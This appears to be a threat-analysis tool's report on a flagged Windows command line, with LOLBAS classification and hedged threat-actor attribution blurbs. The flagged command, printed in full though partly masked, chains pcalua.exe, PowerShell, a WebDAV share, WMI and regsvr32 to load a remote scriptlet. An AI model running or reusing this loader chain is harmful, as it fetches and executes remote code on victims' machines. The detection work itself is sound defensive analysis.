Notable — review recommended
Medium-confidence signals: Loader.
"C:\WINDOWS\system32\pcalua.exe" -a "powershell" -c "Start-Service WebClient -ea 0;net use Z: /delete 2>$null; net use Z: \\[INTERNAL-HOST]@SSL\d3f8a142c9; ([wmiclass]'Win32_Process').Create('regsvr32 /s /n /u /i:Z:\poc.sct REDACTEDSensitive data (credentials, internal IPs) was detected and masked before storage.
Uses PowerShell to spawn a process via WMI.
The command leverages Pcalua.exe and Powershell.exe, a Windows set of binaries catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Execute.
While the detected binaries have legitimate administrative uses, their presence in an investigation warrants scrutiny of process lineage, network connections made during execution, and any files created or modified.
unexpected EOF while looking for matching '"' (position 238)
This tool uses a Linux bash parser (bashlex). Windows commands, PowerShell, and embedded scripts are expected to fail shell parsing — analysis above is not affected.
Powershell.exe is a a task-based command-line shell built on .NET.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Chinese group uniquely conducting both state-sponsored espionage and financially motivated cybercrime. Notable for supply chain attacks and video game industry targeting.
Iranian government-linked group targeting Middle Eastern and international organizations in energy, financial, government, and critical infrastructure sectors.
Loosely organized group known for social engineering, SIM swapping, and extortion. Breached Microsoft, Okta, Samsung, Nvidia, and Uber through credential theft and insider recruitment.
Group responsible for the Triton/TRISIS attack targeting Schneider Electric safety systems at a Saudi petrochemical plant — the first known malware designed to cause physical damage.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.